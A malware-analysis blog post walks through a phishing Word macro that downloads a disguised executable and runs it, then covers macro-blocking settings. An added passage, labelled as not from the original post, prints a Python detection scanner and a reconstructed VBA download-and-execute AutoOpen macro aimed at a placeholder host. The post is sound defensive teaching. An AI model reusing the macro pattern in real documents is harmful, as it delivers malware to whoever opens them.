War Room

Shells from above
Real World Malware Analysis: The Original Phishster

February 16, 2015 By malarkey

When my friend first told me that he was phished with a Word document, two infection methods came to mind: either it was a macro enabled in the document, or it was the recent MS14-064 vulnerability for Office. So let’s take a look! Here is what the offending document looks like when opened:

[Figure: the phishing document as it appears when opened]

Macros are the winner! What do they do? In Word, go to View > Macros > View Macros.

[Figure: the macro source as shown in the VBA editor]

Looks simple enough. Let’s step through it.

The macro obfuscates the URLDownloadToFileA function it declares in Visual Basic by naming it MKw5X. On opening, it creates two variables, bu4Cd (the $ suffix indicates that the variable is a string) and I46hDj: one holds the URL of the executable to download and the other the location to save it. AVG tells us that this URL has potential malware. The macro then calls the obfuscated URLDownloadToFileA with the URL and file path variables and saves the file. We can see that the file is going to be saved as putty.exe, the name of a common, benign program. Finally it uses CreateObject to create a WshShell object, which allows it to run the file it just downloaded! Not bad. In the next part of this series we will take a look at the executable file and see what information we can get from it. Before that, let’s take a look at a couple of ways to mitigate the issue with what we know so far.
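The same declare-alias, download, then WshShell pattern walked through above is easy to spot in extracted VBA source. The following is an added detection example, not code from the original post: the sample macro is constructed to mirror the alias, variable names and call sequence described (with a placeholder URL and save path rather than the real document's values), and the scanner maps the alias back to the hidden API, counts its call sites and flags the auto-run plus shell-object combination.

```python
import re

# Constructed sample that mirrors the macro described above; the URL and path are
# placeholders, not the values from the real document.
SAMPLE_VBA = '''
Private Declare Function MKw5X Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub AutoOpen()
    Dim bu4Cd$, I46hDj$
    bu4Cd$ = "http://example.invalid/putty.exe"
    I46hDj$ = "C:\\Users\\Public\\putty.exe"
    MKw5X 0, bu4Cd$, I46hDj$, 0, 0
    Set o = CreateObject("WScript.Shell")
    o.Run I46hDj$
End Sub
'''
# Win32 APIs a document macro has no benign reason to hide behind a random alias
SUSPICIOUS_APIS = {"urldownloadtofilea", "urldownloadtofilew",
                   "shellexecutea", "shellexecutew", "winexec"}
ALIAS_RE = re.compile(r'Declare\s+(?:PtrSafe\s+)?Function\s+(\w+)\s+Lib\s+"[^"]+"'
                      r'\s+Alias\s+"([^"]+)"', re.I)
AUTO_RE = re.compile(r'\bSub\s+(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b', re.I)
SHELL_RE = re.compile(r'CreateObject\s*\(\s*"(WScript\.Shell|Shell\.Application)"', re.I)
STR_RE = re.compile(r'"([^"]*)"')
URL_RE = re.compile(r'https?://', re.I)

def analyze_vba(src):
    """Return the indicators found in one VBA module; 'verdict' summarises them."""
    aliases = dict(ALIAS_RE.findall(src))  # MKw5X -> URLDownloadToFileA
    calls = {}  # real API name -> number of call sites (Declare line excluded)
    for name, real in aliases.items():
        if real.lower() in SUSPICIOUS_APIS:
            calls[real] = len(re.findall(r'\b%s\b' % re.escape(name), src, re.I)) - 1
    literals = STR_RE.findall(src)
    urls = [s for s in literals if URL_RE.match(s)]
    exe_paths = [s for s in literals if s.lower().endswith(".exe") and not URL_RE.match(s)]
    shell = SHELL_RE.search(src) is not None  # WshShell object used to run the file
    autoexec = [m.lower() for m in AUTO_RE.findall(src)]  # runs without a user click
    downloads = any(api.lower().startswith("urldownloadtofile") and n > 0
                    for api, n in calls.items())
    if downloads and shell and autoexec:
        verdict = "download-and-execute on open"
    elif downloads or shell or calls:
        verdict = "suspicious"
    else:
        verdict = "no indicators"
    return {"aliases": aliases, "calls": calls, "urls": urls, "exe_paths": exe_paths,
            "shell_object": shell, "autoexec": autoexec, "verdict": verdict}
```

Feed it the VBA text dumped by a macro extractor such as olevba from oletools; the extracted URL and save path are the indicators worth blocking at the proxy and hunting for on disk.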

Prevention

Macros, though very dangerous, can be very useful. Depending on a user’s need, it is possible to disable them completely, disable them until enabled by the user, or allow them to run automatically (which we can see is not a good idea). Macros are disabled by default, but in the case that they are not, here are a couple of steps you can take to mitigate the risk.

In Group Policy, you can disable all macros completely by enabling the setting named “Disable VBA for Office Applications”. This disables VBA across all of Office, so if macros are needed in just Excel, you would not be able to use this option. At the very least, the “VBA Macro Notification Settings” Group Policy setting should be set to “Disable all with notification”, as this alerts the user that the document contains a macro, which will not run unless they enable it. This is where user training will go a long way in protecting an organization.

For individual use, in each of the Office products under Options > Trust Center > Macro Settings you can set it to disable all macros with notification.

[Figure: the Trust Center macro settings dialog with “Disable all macros with notification” selected]

We could also block this specific domain, although that would only prevent this individual case and can easily be evaded by changing the URL, but it’s a start!

A note about phishing emails: phishing emails rarely look like spam anymore and often have a good pretext. In this case, the email came as a response to a job posting. If the user doesn’t know about macros and enables them, the attacker is in. The combination of user training and secure settings is key to reducing the risk of this type of attack.

In the next segment of this series, we will take the malware that the macro downloaded and do some basic static analysis. Stay tuned!

References:

http://technet.microsoft.com/en-us/library/ee857085%28v=office.15%29.aspx
